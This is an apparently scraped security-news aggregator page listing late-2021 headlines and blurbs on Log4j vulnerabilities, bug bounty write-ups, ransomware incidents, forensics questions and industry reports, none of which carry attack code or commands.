    IoT honeypots reveal the cyber threats facing IoT devices
    Honeypots have historically been used as decoy devices that help researchers better understand the dynamics and impact of threats on the network.
    Over 1,200 websites use MitM phishing kits that let cybercriminals bypass 2FA authentication
    Man-in-the-middle phishing kits are real-time phishing kits that need no manual operation, because everything is done automatically through a reverse proxy.
    Summary and analysis of ThinkPHP5 deserialization exploit chains
    This article summarises and analyses the deserialization exploit chains in ThinkPHP 5.0 and 5.1, partly to have them on hand when needed and partly as a deeper study of PHP deserialization.
    Incident response: trojan detection with Yara rules
    Yara is a rule-based malicious-sample analysis tool that helps security researchers and blue teams analyse malware, and lets you define custom detection rules to detect malware during incident forensics.
    Subway security gates found to have multiple severe security vulnerabilities
    These vulnerabilities could allow remote attackers to bypass authentication requirements, tamper with metal detector configuration, and even execute arbitrary code on the device.
    Hidden APIs of large car companies keep leaking: how should we inventory company assets
    How large enterprises do asset inventory
    "2021 Enterprise Security Operations Practice Report" released: from passive defence to proactive action
    From passive to proactive, enterprise security operations systems have firmly seized the initiative.
  • Open

    If kubectl suddenly reports "not found" 😫
    The kubectl I use every day suddenly started reporting not found. (I suspect a brew upgrade at some point caused the problem.) zsh: command not found: kubectl It was already installed, and reinstalling gave the same result. Searching around, this issue seems to occur when it was installed via homebrew. Reinstall kubectl with brew, then use brew link to symlink the installed files into the homebrew prefix, and the command works again. $ brew reinstall kubectl $ brew link --overwrite kubernetes-cli For reference, the homebrew prefix is the PATH location homebrew uses.

  • Open

    Why haven't African countries invested much in the Cybersecurity Industry?
    Most of the African countries don't know what Cybersecurity is! Some know it but they have not yet faced a serious risk! This is the main reason why countries like Uganda don't embrace Cybersecurity and Technology at large, and this causes a serious threat to a country shortly because technology is becoming unavoidable! submitted by /u/Cyber_Catalyzer [link] [comments]  ( 1 min )
    Question about java deobfuscation HTB module
    Hi all, I am doing the "Javascript deObfuscation" module on the hackthebox platform (very very nice!). I read this: As previously mentioned, the above-used method of obfuscation is packing. Another way of unpacking such code is to find the return value at the end and use console.log to print it instead of executing it. Can anyone explain this to me? Possibly with an example? Thank you submitted by /u/g-simon [link] [comments]  ( 1 min )
    Nessus says IPMI hashes are disclosed, but metasploit's ipmi_dumphashes returns nothing?
    I see this fairly frequently during pentests where Nessus raises an issue about IPMI Hash Disclosure, but of course doesn't show any hashes. When using ipmi_dumphashes I get nothing in response. Does anyone know any other utilities to check for IPMI hash disclosure and confirm if Nessus is giving me a false positive? submitted by /u/security_intern [link] [comments]  ( 1 min )
    Someone is trying to access my accounts...what to do?
    I believe someone is in possession of my personal information and is trying to access my accounts. Over the last few days I have been prompted to confirm my identity in Venmo and Paypal. I also just received notice that someone is trying to access my Twitter account in Ecuador. I have changed my Google password and all of my financial passwords. I have not detected any fraudulent activity on any of my cards, but am at a loss what to do next. Should I simply change every password I have? Is there a better course of action? The only way I can think they may have gotten my information is that I pirate tv shows on my personal computer. It recently blue screened and I had to wipe everything. Pretty much at a loss for what to do at this step as it seems someone is attempting to access my account, but at this point hasn't been able to bypass 2fa or basic security questions. submitted by /u/LechronJames [link] [comments]  ( 2 min )
    Looking for advice and recommendations for RMM software.
    We're dealing with sensitive and juicy data, protected by strict regulations, in an environment where we could be targeted for being a little start up with access to some very interesting things. I'm of two minds. . . On the one hand, just the presence of RMM is a potential vuln (especially giving some cloud service admin access to my devices). On the other hand, I want to be able to keep track of stuff (and audit my users, who are scattered around the country, at least quarterly). I need an RMM solution for both MacOS and Windows that has a good track record and (hopefully) a reasonably open audit history. I'd feel more comfortable with something where I can host my own server, not have it call home somewhere in the cloud (I realise that's probably a nonstarter, at least as far as MacOS is concerned). I was moderately excited about Tactical RMM, but after what just happened with them, I'm a "hell no!" on that one. Any thoughts on this? submitted by /u/thebardingreen [link] [comments]  ( 1 min )
    Best password manager?
    Hey security folks, help me choose the best password manager. Let me know which password manager you are using and why. What's the best password manager between 1password vs dashlane vs bitWarden? submitted by /u/noob_bug_hunter [link] [comments]  ( 4 min )
  • Open

    PrintNightmare and SSH Tunnels
    submitted by /u/m_edmondson [link] [comments]
    Flagpro malware is threatening enterprises and is backed by Chinese hackers
    submitted by /u/Gengar-boy [link] [comments]  ( 1 min )
    How I built the PoC for the Log4j zero-day security vulnerability
    submitted by /u/melbadry9 [link] [comments]
  • Open

    open directories containing music (4)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (3)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (2)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (1)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    ARCHIVES OF INTERNET RADIO SHOWS. Music and interviews seemingly. Might be easier to check parent directory first.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Various operating system ISOs
    submitted by /u/Plastic_Preparation1 [link] [comments]
    An Audiobook for every novel in the Nero Wolfe detective series by Rex Stout
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Music. Hmm. Some of it is the original artists, at least in the first directory. The rest seems to be covers and maybe original material by some French band. There is a trio mentioned in the parent folder. But in the open directory folders which have people's names, there are more than 3 folders. Whew.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    classical music in some of the directories.
    submitted by /u/International_Milk_1 [link] [comments]
    Telegram bot-OD downloader
    I am thinking of creating a telegram bot that crawls and downloads ODs. Has that already been done? Is it a good idea? And could I be legally accused of anything? submitted by /u/_NullPointerEx [link] [comments]  ( 3 min )
  • Open

    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, hope you guys are doing well. Here is the story of how I am able to crash anyone’s Mozilla Firefox by just sending a single email… Continue reading on Medium »  ( 1 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi, Continue reading on Medium »  ( 1 min )
    Jet Protocol Upgrade Bug Patch Disclosure
    On Dec 21st, we performed an ad hoc upgrade to our mainnet program that introduced a critical vulnerability that was quickly discovered… Continue reading on Jet Protocol »  ( 1 min )
    How To Hack Any Website
    [PART -3 Exploiting Trust] Continue reading on System Weakness »  ( 12 min )
    LENOVO OPEN REDIRECTION
    Hello Hackers!! Continue reading on Medium »  ( 1 min )
    OTP bypass via response manipulation
    Hello everyone I’m Jan Jeffrie Salloman, I started bug hunting 1 year ago. This writeup is about an OTP bypass using response manipulation… Continue reading on Medium »  ( 1 min )
    Polygon Lack Of Balance Check Bugfix Postmortem — $2.2m Bounty
    Whitehat Leon Spacewalker reported a critical vulnerability in Polygon on December 3. Continue reading on Immunefi »  ( 4 min )
  • Open

    Log4j CVE-2021-44228
    Krisp disclosed a bug submitted by karthik86: https://hackerone.com/reports/1431624
    SQL Injection leads to retrieve the contents of an entire database.
    BlockDev Sp. Z o.o disclosed a bug submitted by u-itachi: https://hackerone.com/reports/1002641
  • Open

    Help with installing Autopsy
    submitted by /u/UserNo007 [link] [comments]  ( 1 min )
    Forensic Analysis of USB tripwire that shreds your LUKS Header
    submitted by /u/maltfield [link] [comments]  ( 1 min )
    Tips on GCFA (SANS FOR508) certification
    Hello everyone, I've just registered for GCFA (SANS FOR508). What are the major tips that anyone can share for this certification? One piece of feedback I heard from colleagues who took it a couple of months back was that the practice papers don't have much similarity to the actual exam. Which is kind of a concern, as I have a GCIH (SANS SEC504) and my practice papers were very similar to the actual exam. Appreciate any feedback from anyone who has recently attempted the certification, thanks! submitted by /u/Writtensine6 [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-29 Review
    Business security development insight report 2021 by ourren Consumer IoT security baseline by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Raspberry Pi special: setting up a Kali environment
    Pick up that Raspberry Pi gathering dust and do something meaningful with it! For beginners who want to learn information security on a low budget, let's get moving!  ( 1 min )
    FreeBuf Morning Report | Online password manager LastPass hit by large-scale credential stuffing; court finds Haogou app violated privacy rights
    Global news 1. Log4j 2.17.1 released, fixing a new remote code execution bug. Apache has released Log4j version 2.17.1, fixing a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832. [Foreign report - read the original] 2. Haogou app read users' phone clipboard contents without permission; court finds it violated privacy rights. Phone user Xiao Lin (pseudonym) found while using the Haogou app that, without consent, the app monitored and collected the contents of their phone's clip  ( 1 min )
    "Information security technology: Technical requirements for cryptographic application design in information systems" (draft for comment) released
    The draft for comment proposes technical recommendations for designing cryptographic application schemes in information systems, providing guidance and reference for such design work.
    Data loss prevention market to reach USD 6.265 billion by 2026
    By 2026, the data loss prevention market will reach USD 6.265 billion.  ( 1 min )
    Both a security risk and an infringement: risky streaming apps appear in Samsung's app store
    These apps masquerade as the now-defunct piracy video app ShowBox and have already triggered Play Protect security warnings on multiple users' devices.
    48 questions on MLPS 2.0 and commercial cryptography application products (part 2)
    Entering the MLPS 2.0 era, in line with developments in IT application and the cybersecurity situation, the scheme has continually enriched its content, expanded its scope of protection, improved regulatory measures, and gradually built out the policy, standards and support system for multi-level cybersecurity protection.  ( 1 min )
    In the cloud era, here is how enterprises can do cloud security audits!
    In the cloud era, enterprises should combine their own security compliance requirements with the characteristics of the public cloud to define cloud security audit check items, and make effective use of public cloud configuration audit services to raise the level of audit automation in the cloud.  ( 1 min )
    Major | "2021 China White Hat Survey Report" officially released
    Going forward, white hats should try more vulnerability areas they are unfamiliar with or not yet good at, and update their bug-hunting knowledge and skills.  ( 1 min )
    Analysis of the domain privilege escalation vulnerabilities CVE-2021-42287 and CVE-2021-42278
    In summary, this bug, initially called noPac, is really an attack for cross-domain situations and has little practical significance.  ( 3 min )
    Online password manager LastPass hit by large-scale credential stuffing
    Online password manager LastPass has acknowledged that attackers carried out a large-scale credential-stuffing attack against its users, attempting to access their cloud-hosted password vaults.
  • Open

    Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends
    Strategically aged domain detection can capture domains registered by advanced persistent threats or likely to be used for network abuses. The post Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends appeared first on Unit42.
  • Open

    BountyHunter HackTheBox Walkthrough
    Bounty hunter is a CTF Linux machine with an Easy difficulty rating on the Hack the Box platform. So let’s get started and take a The post BountyHunter HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Log4j 2.17 JDBCAppender RCE (CVE-2021-44832)
    Another one… another one came out. Since the previous post was already too long to cover everything at once, I plan to split the additional CVEs out one at a time. History of Log4j RCE [2021-12-10] CVE-2021-44228 (RCE) [2021-12-14] CVE-2021-45046 (DOS / RCE) [2021-12-18] CVE-2021-45105 (DOS) [2021-12-27] CVE-2021-44832 (RCE) Affected ≤2.17, ≤2.12.3, ≤2.3.1 The versions above are vulnerable. However, they are not unconditionally vulnerable: the attacker needs permission to modify the logging configuration file, so a successful attack requires additional elements such as MITM. So unlike the previous RCE it is not a Critical issue but Major (CVSS 6.
  • Open

    Log4jscanner: A Log4j vulnerability filesystem scanner and Go package
    Article URL: https://github.com/google/log4jscanner Comments URL: https://news.ycombinator.com/item?id=29723953 Points: 3 # Comments: 0  ( 3 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified: All you need to know about CVE-2021-44228
    Collection of all the required details to understand the Log4Shell (CVE-2021-44228) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    Implant.ARM.iLOBleed.a | Padvish Threats Database
    submitted by /u/dmchell [link] [comments]
  • Open

    OSINT Cheatsheet: A Mindmap for Your Investigation
    This is a guest post by Steve Hall (https://twitter.com/shall_1) Continue reading on Medium »

  • Open

    Red & Blue-Team Quick Reference Gitbooks
    Hi everyone! I would like to share with you one of my gitbooks, focused on DFIR, Malware and Blue-Team in general. It's a WIP in progress. I'm actually adding more and more things as I myself learn along the way. 📘 Hunter - Jorge Testa There you have my Red-Team version. WIP too. 📕 Tryharder - Jorge Testa Hope you like it! submitted by /u/J-Testa [link] [comments]  ( 1 min )
    Microsoft Defender for Identity security alert lateral movement playbook
    submitted by /u/dmchell [link] [comments]
  • Open

    Third Log4j RCE Vulnerability Discovered in Apache Logging Library [With Technical details & PoC]
    submitted by /u/Gorkha56 [link] [comments]
    DFIR or AppSec?
    Hi everyone, I'm currently a Computer Science student and I would love to work in cybersecurity. There are 2 roads that I want to explore and I was wondering if you could help me decide which career path to choose, as I really like both of them equally: (1) start as a SOC Analyst and specialize in DFIR; (2) work for a couple of years as a software engineer, after that transition to AppSec. Thank you and really looking forward to your answers! submitted by /u/cyberprime24 [link] [comments]  ( 1 min )
    Most comprehensive(or better in another way) list of default creds?
    I can see there are a lot of sites that list default creds, but they seem to be missing a lot like default setting web apps. Usually it doesn't take too long to google, but not always. What are your favorite lists for this? Is it better to just google each time or have you found any gems out there? submitted by /u/Euphorinaut [link] [comments]  ( 1 min )
    "Pentesting" a friend's web app, it's a bit scary..
    Hey everyone! First of all, I'm not a pentester. I'd like to be one one day, but for now I remain a noob who is trying harder every day. Now that that's out of the way, let me start.. So I met up with a friend of mine recently who had an idea for a web app and hired a company to develop it. It's still in development, but the other day he showed me the progress and asked me for my general opinion on the idea and the status of the website, and since he also receives regular backups of the code, he asked me to take a quick look at it. It seemed to be built on top of WordPress, nothing fancy, but since I'm interested in Pentesting and Web application security I took a quick glance at interesting files like login, etc... Now again, I'm not a web dev and don't have great skills in php or js, but I can read some o…  ( 5 min )
    Has anyone ever read Kevin Mitnick’s The Art of Invisibility? How useful was the advice?
    It’s a book released in 2017 that details how to secure your OPSEC. A lot of 5 star reviews on amazon, can anyone summarize the chapters? There were 16. submitted by /u/Original_Ad_1103 [link] [comments]  ( 3 min )
    In what fields of InfoSec is there potential for entrepreneurship?
    I am currently a high school student passionate about InfoSec studying Network+ material, and as someone who wants to own a business one day I was interested in which specific areas of this field there is startup potential. Of course, I plan on gaining plenty of experience in jobs before contributing my own innovation so your answers will allow me to calibrate my learning/career path to be more effective for my goals. submitted by /u/Connect_Estate_8617 [link] [comments]  ( 4 min )
  • Open

    New Log4j2 vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-44832 Comments URL: https://news.ycombinator.com/item?id=29718845 Points: 97 # Comments: 41  ( 3 min )
    Important: Security Vulnerability CVE-2021-44832
    Article URL: https://logging.apache.org/log4j/2.x/ Comments URL: https://news.ycombinator.com/item?id=29718814 Points: 2 # Comments: 0  ( 5 min )
    Log4j Vulnerability Scanning Tool from Jfrog
    Article URL: https://github.com/jfrog/log4j-tools Comments URL: https://news.ycombinator.com/item?id=29715230 Points: 1 # Comments: 0  ( 6 min )
  • Open

    Important: Security Vulnerability CVE-2021-44832
    Article URL: https://logging.apache.org/log4j/2.x/ Comments URL: https://news.ycombinator.com/item?id=29718814 Points: 2 # Comments: 0  ( 5 min )
  • Open

    Intercepting Google CSE resources: automate Google searches with client-side generated URIs (for…
    Introduction Continue reading on Medium »  ( 11 min )
  • Open

    New Log4j CVE - CVE-2021-44832. Another JNDI RCE. Fixed in latest release.
    submitted by /u/emmainvincible [link] [comments]  ( 1 min )
    Turning bad SSRF to good SSRF: Websphere Portal
    submitted by /u/Mempodipper [link] [comments]
    IRIS - A web collaborative platform for incident response analysts allowing to share investigations at a technical level
    submitted by /u/Maijin [link] [comments]
    Pet surveillance with Falco
    submitted by /u/MiguelHzBz [link] [comments]
    Using laser speckle patterns to see keypresses etc.
    submitted by /u/anfractuosus [link] [comments]  ( 1 min )
    Integrating Canary Tokens with Microsoft Sentinel SIEM
    submitted by /u/m_rothe [link] [comments]
    PHP LFI with Nginx Assistance
    submitted by /u/dL2Hj4wR [link] [comments]  ( 1 min )
    V8 Heap pwn and /dev/memes - WebOS Root LPE
    submitted by /u/DavidBuchanan [link] [comments]
    Encoding.Tools (alternative to CyberChef and Burp Suite Encoder)
    submitted by /u/mehaase [link] [comments]
  • Open

    Hack Us Will You?
    Delorians, Continue reading on Medium »  ( 1 min )
    Astroport Boosts Bug Bounty to $3m, Takes Top Leaderboard Spot
    Astroport has just doubled its critical bug bounty reward from $1.5m to $3m, making it the largest bounty on Immunefi’s platform, beating… Continue reading on Immunefi »  ( 1 min )
    Hunting for Bugs in File Upload Feature:
    In this blog, I will be listing some file upload vulnerabilities such as RCE, SSRF, CSRF, XSS and many more. Continue reading on Medium »  ( 4 min )
    SSRF in Align Technology, Inc.
    Hi everyone. Align Technology, Inc. is a manufacturer of 3D digital scanners and the Invisalign clear aligners used in orthodontics. It is… Continue reading on Medium »  ( 1 min )
    [Campaign] — HappyLand testnet invitation!
    HappyLand Testnet will arrive at the end of December and we are super thrilled to welcome you. This is an opportunity to let you imagine… Continue reading on Medium »  ( 2 min )
    Bypassing HttpOnly with phpinfo file
    While doing Web Application assessment with Higgsx, We found stored Cross-Site Scripting(XSS) which was a nice finding but we could not… Continue reading on Medium »  ( 1 min )
    CVE-2021–38314 Leads to Sensitive Information Disclosure
    Hello Hackers! Continue reading on Medium »  ( 1 min )
    How having a student mail can help you in Info-sec.
    Hello Everyone, I’m Vishal and it’s my first ever blog. So if you find any grammatical error or something missing, don’t pardon me; instead… Continue reading on Medium »  ( 5 min )
    Bounty Evaluation GitHub = $15,000 US Dollars | Rate Limit
    I found the bug on the GitHub website where I bypassed the login authentication. In this walkthrough I will show how it was done. Let’s… Continue reading on Medium »  ( 2 min )
    Bug Report Update!
    We are very grateful for the overwhelming support our community has shown for our ongoing testnet & bugbounty programme. Our bugbounty… Continue reading on Medium »  ( 2 min )
    Bug Bounty Programs for Blockchain Projects
    The list of methods and strategies applied by hackers to compromise the security of their targets is constantly expanding and they… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-28 Review
    Serial: the evolution of advanced threat governance (part 4) by ourren Serial: the evolution of advanced threat governance (part 3) by ourren Serial: the evolution of advanced threat governance (part 2) by ourren Serial: the evolution of advanced threat governance (part 1) by ourren SecWiki Weekly (issue 408) by ourren Transparency vs. national security? Calls to reform the US VEP policy rise again by ourren Vulnerability disclosure is an intractable problem: a brief overview of coordinated vulnerability disclosure (CVD) by ourren THINE: representation learning for temporal heterogeneous information networks by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Dell Driver EoP (CVE-2021-21551)
    submitted by /u/nanabingies [link] [comments]
  • Open

    [Security bulletin] Multiple backdoor vulnerabilities in Auerswald COMpact 5500R PBX firmwa...
    Recently, RedTeam Pentesting published multiple backdoor vulnerabilities in the Auerswald COMpact 5500R PBX firmware. Through these backdoors an attacker can...  ( 1 min )
    [Security bulletin] Apache APISIX Dashboard authentication bypass vulnerability (C...
    Recently, an Apache APISIX Dashboard authentication bypass vulnerability surfaced online; an attacker can use it to bypass the authentication process and, through...  ( 1 min )
  • Open

    A first look at the beta of HFish, an enterprise-grade free domestic honeypot
    I was lucky enough to get beta access from the HFish product team, and here I share my personal experience and some deployment methods. There's an easter egg at the end.  ( 1 min )
    Farewell, script kiddie series | Java security (1): Java local and remote debugging tips
    The first series of lessons mainly covers Java security topics  ( 1 min )
    [Original] VulnHub practice: CyNix: 1
    VulnHub practice: CyNix: 1  ( 1 min )
    World's largest photo service company hit by ransomware; pirated copies of the new Spider-Man film contain a cryptomining trojan | December 28 global cybersecurity headlines
    Albanian prime minister apologizes for data leak
    After the personal data of hundreds of thousands of Albanian citizens leaked onto the internet, the Albanian prime minister publicly apologized.
    Apache HTTP Server 2.4.52 released, fixing critical vulnerabilities
    Users and administrators are advised to review the Apache advisory and update their version as soon as possible to avoid unnecessary potential attacks.  ( 1 min )
    FreeBuf Morning Report | Nearly 70% of netizens feel manipulated by algorithms; Albanian prime minister apologizes for data leak
    The "China Public Perception of Overall Security Report" released by Peking University's Internet Development Research Center shows that nearly 70% of the public worry about account and personal information leaks.  ( 1 min )
    QNAP NAS devices hit by ransomware over Christmas
    The eCh0raix ransomware attackers appear to have created an account in the system administrators group and used it to encrypt all files on the NAS.  ( 1 min )
    Logistics giant DW Morgan exposed 100 GB of customer data
    The Website Planet security team found a misconfigured Amazon S3 bucket containing about 2.5 million files totaling over 100 GB.  ( 1 min )
    Shutterfly, the world's largest photo service company, hit by Conti ransomware
    Founded in 1999, Shutterfly claims its online photo storage is the world's largest, holding 70 PB of data, about 1.6 billion photos.  ( 1 min )
    Anti-cracking for Unity games: code cracking and asset theft, starting from attack risk
    This article focuses on "anti-cracking", describing these security risks and how to give a Unity game comprehensive, matrix-style protection upgrades.  ( 1 min )
    Swagger Injection attacks via API declaration files
    Developers should treat API declaration files as an untrusted input source and add corresponding security controls to the automated code generation stage.  ( 1 min )
    Security requirement analysis of 5G SMF and UPF network functions based on free5gc + UERANSIM
    This article analyzes, at the packet and code level, the SMF and UPF network function security requirements defined in the 3GPP Security Assurance Specification (SCAS).  ( 6 min )
  • Open

    Looking back at 2021 in cybersecurity with Netsparker
    As 2021 draws to a close, it is time for our customary round-up of the year’s most popular and relevant posts on the Netsparker blog, with a sprinkling of last-minute news and predictions for the coming year. READ MORE  ( 4 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    google drive movie link
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    186 persiangig OD Sites Potential NSFW
  • Open

    Windows resolves/"connects" to external IP even without internet access?
    I was poking around in my router the other day and found something I can't really understand: my Windows machine tried to connect to an external IP address (13.?.?.?) when there was no internet access and no DNS. My modem's internet cable was disconnected and both modem and router were rebooted before I powered up the Windows machine. All DNS caches should be empty. The router connections page shows 1 connection from my Windows machine to 13.?.?.? with status SYN_SENT. Of course, it didn't connect, but how did it know what external IP to try without DNS? The IP is a Microsoft one but I didn't write down what it was (and I didn't save search history) since I initially didn't think it was strange. I tried repeating the same thing several times, but never saw any more external IPs (but a bunch of 198.x.x.x which is what I'd expect when internet is down). The only difference the first time is that it was installing a previously downloaded Windows update. Is this unusual? Is MS known to go directly to IP addresses like this? This machine only has Windows installed and drivers from Windows Update, so not much on here. submitted by /u/Vivid-Elk-8337 [link] [comments]  ( 2 min )
    Linux servers security
    Hi, we have 100+ Linux servers running apache/tomcat and Nginx, and a few servers are public-facing with IP control. I am trying to see if there is any open source tool to scan all 100+ servers on a daily basis and report any vulnerabilities. Thanks. submitted by /u/Prestigious-Yam-3510 [link] [comments]  ( 1 min )
    Best IT backgrounds to prepare for InfoSec
    I am currently a computer science student and I want to pursue a career in cybersecurity, but I know that in order to get into security I will need some kind of experience before I can get a job in the field. I'm just wondering what are the best IT backgrounds to have, or things that I should focus on, that would help me develop the skills needed for security careers. I know it depends on what kind of focus I want in security, and for now I'm thinking more towards the defensive side, like engineer maybe, but I would prefer having answers based on either role (attack and defense). So to rephrase it a bit better: I wanna know what are the best temporary jobs that I could do to develop the skills needed to switch into security (soft dev, web dev, data sci, etc...)? submitted by /u/iTsObserv [link] [comments]  ( 7 min )
  • Open

    Playing around COM objects - PART 1
    submitted by /u/dmchell [link] [comments]
    Dumping LSASS with Duplicated Handles
    submitted by /u/dmchell [link] [comments]
    snovvcrash/NimHollow: Nim implementation of Process Hollowing using syscalls (PoC)
    submitted by /u/dmchell [link] [comments]
  • Open

    Winning the Impossible Race – An Unintended Solution for Includer’s Revenge / Counter (hxp 2021)
    submitted by /u/Caustic66 [link] [comments]
    remote Chaos Computer Congress Streaming
    submitted by /u/mubix [link] [comments]
    A Deep Dive into DoubleFeature: Equation Group's Post-Exploitation Dashboard
    submitted by /u/Megabeets [link] [comments]

    Why did my last movie post disappear?
    submitted by /u/International_Milk_1 [link] [comments]
    If you'll allow me - for movie or TV show fans.
    There might be one person out there who doesn't know this. So let's say you download a movie, expecting it to be in the English language, but find that Harrison Ford is speaking Persian, and it doesn't even sound like Mr F. In whatever player you use, go to the audio option, and check if there is an alternative track. To make sure there is an English language track before downloading, copy the link of the movie/TV episode and open it in your player. Then you can check before downloading. submitted by /u/International_Milk_1 [link] [comments]  ( 2 min )
    I'd like to make a motion for a couple of new flairs: "Junk Science" and "Conspiracy"
    submitted by /u/brother_p [link] [comments]  ( 1 min )

    Ethical Hacking Roadmap and Resources
    Checklist for the things that one has to learn while learning Linux: Shell, Navigation, File System, Redirection, Permissions, Processes… Continue reading on Medium »  ( 4 min )
    Full account takeover vulnerability in Minecraft
    Continue reading on Medium »  ( 2 min )
    WEB VULNERABILITIES 7.0
    Cross-Site Scripting Continue reading on Medium »  ( 6 min )
    OSINT Research With Recon-ng
    This piece goes over the basics of Recon-ng and how to use it to facilitate OSINT research! I’ll be covering two modules: google_site_web… Continue reading on Medium »  ( 4 min )
    Unlucky Story, Judge Duplicate, and Only Get a Thank You. But It makes Me smile.
    This is from my local bounty program in my country, Indonesia. I found some vulnerabilities in an e-commerce website and I think it would… Continue reading on Medium »  ( 1 min )
    From Simple Recon to Reflected XSS
    whoami Continue reading on Medium »  ( 2 min )
    How I Bypassed Netflix Profile Lock?
    Hi hackers, Continue reading on InfoSec Write-ups »  ( 2 min )
    HOW I GOT MY SECOND SWAG
    Hi everyone! Hope you all are doing good. In this article I am going to show you how I got my second swag from Ivanti by reporting an open… Continue reading on Medium »  ( 2 min )
    DOM Based XSS
    DOM based XSS (cross site scripting) is a client side vulnerability that arises when the javascript takes data from user controllable… Continue reading on Medium »  ( 3 min )

    Help with Autopsy on Mac
    Hi, I need to use Autopsy to analyse an E01 image for my project but am struggling to get it set up on my Mac (running Mojave). I downloaded the .zip file from Autopsy and have all the files but can't seem to get the GUI running. I installed it via 'brew' but at the end of the install it said error Xcode version too low. So I don't know if it has installed properly. Any help would be appreciated. Thanks submitted by /u/UserNo007 [link] [comments]  ( 1 min )

    SecWiki News 2021-12-27 Review
    No news updated today. For more of the latest articles, visit SecWiki  ( 2 min )

    TryHackMe: OhSINT — WriteUp
    Is your information safe enough on the internet? Continue reading on Medium »  ( 4 min )
    OSINT Series … Part-1
    What is OSINT ? Continue reading on Medium »  ( 2 min )

    FreeBuf Morning Report | Ubisoft reportedly deleting inactive paying players' accounts; White House invites vendors to discuss strengthening open-source security
    An anonymous user found that his Ubisoft game account had been deleted; his mailbox had earlier received a warning letter requiring him to log in within 30 days or the account would be permanently deleted.  ( 1 min )
    Encirclement from all sides exposes the deadbeats: a protracted war against the anti-debt-collection underground economy
    The finance industry's long-running war against the anti-debt-collection underground economy has finally reached deep waters.  ( 1 min )
    The Office of the Central Cyberspace Affairs Commission releases the "14th Five-Year" National Informatization Plan
    The Plan is an important component of the "14th Five-Year" national planning system and the action guide directing the informatization work of all regions and departments during the period.
    MIIT and the Standardization Administration jointly issue the Guide to Building a Comprehensive Industrial Internet Standardization System (2021 Edition)
    The Guide proposes that by 2023 the industrial internet standards system be continuously improved, with more than 15 basic common standards formulated covering terminology and definitions, general requirements, supply chain/industry chain, talent and so on.
    Guangzhou SASAC releases the Data Security Compliance Management Guide for Supervised Enterprises (2021 Trial Edition)
    The Guide refines the requirements of higher-level law and is the first compliance operating guide for the dedicated area of data compliance issued by a local state-owned assets supervisor.
    Building NetEase Yidun's SaaS capital-loss prevention and control system
    Business security mainly provides authentication services, including CAPTCHAs, phone-number logs and information verification. Mobile security protects customers' apps through hardening and other measures to prevent reverse engineering and cracking.  ( 1 min )
    Who touched my printer?
    By October 2021 the problem had become serious: large numbers of Windows 10 users who had installed the October patches found they could no longer use network printers normally.  ( 1 min )
    Advantages of the token mechanism over the cookie mechanism
    When clients frequently request data from the server, the server frequently queries the database for the username and password, compares them, judges whether they are correct and returns a corresponding message; it was against this background that tokens came into being. Simple  ( 1 min )
    Web application attacks are surging; it's time to protect APIs!
    Since October 2019, web application attacks against UK businesses have increased by 251%.  ( 1 min )
    Tech share | Common DDoS attack types and defensive measures
    DDoS attacks will be characterized by high frequency, high growth and large traffic volumes, and their threat to network security will grow by the day, so DDoS protection work can no longer be delayed.  ( 1 min )
    Ransomware may become the biggest threat of 2022; French IT services company hit by ransomware attack | Global cybersecurity hotspots, December 27
    Security experts have discovered a new banking trojan spread through fake Google Play Store pages. Strangers pretend to be showing a well-known bank's app.  ( 1 min )
    The online "attendance clock-in tool" is actually a black- and gray-market cheating tool
    Although the online "attendance clock-in tool" can solve some workers' clock-in "worries", it is a form of fake attendance and a breach of workplace trust.
    Experts detail a macOS vulnerability that lets malware bypass Gatekeeper
    The root of the problem lies in script-based, unsigned, un-notarized applications that do not explicitly specify an interpreter, resulting in a complete bypass.  ( 1 min )
    Usage up 46%: the privacy-focused search engine DuckDuckGo is growing fast
    The privacy-focused search engine DuckDuckGo continued to grow rapidly in 2021 and currently averages more than 100 million search queries per day.  ( 1 min )
    From network security to cloud services, Topsec uses security to drive the cloud computing industry
    Topsec develops its own cloud products with an integration mindset, using security to help the cloud computing industry develop.
    Do you really know how to use a search engine? Learn these advanced operators to get twice the result with half the effort
    This article introduces several commonly used advanced search-engine operators; mastering them will make your information retrieval far more efficient.  ( 1 min )
    Gartner releases five influential technologies from its 2022 Emerging Technologies and Trends Impact Radar
    This year's Emerging Technologies and Trends Impact Radar includes 23 emerging trends and technologies most likely to bring change and transformation to the market.
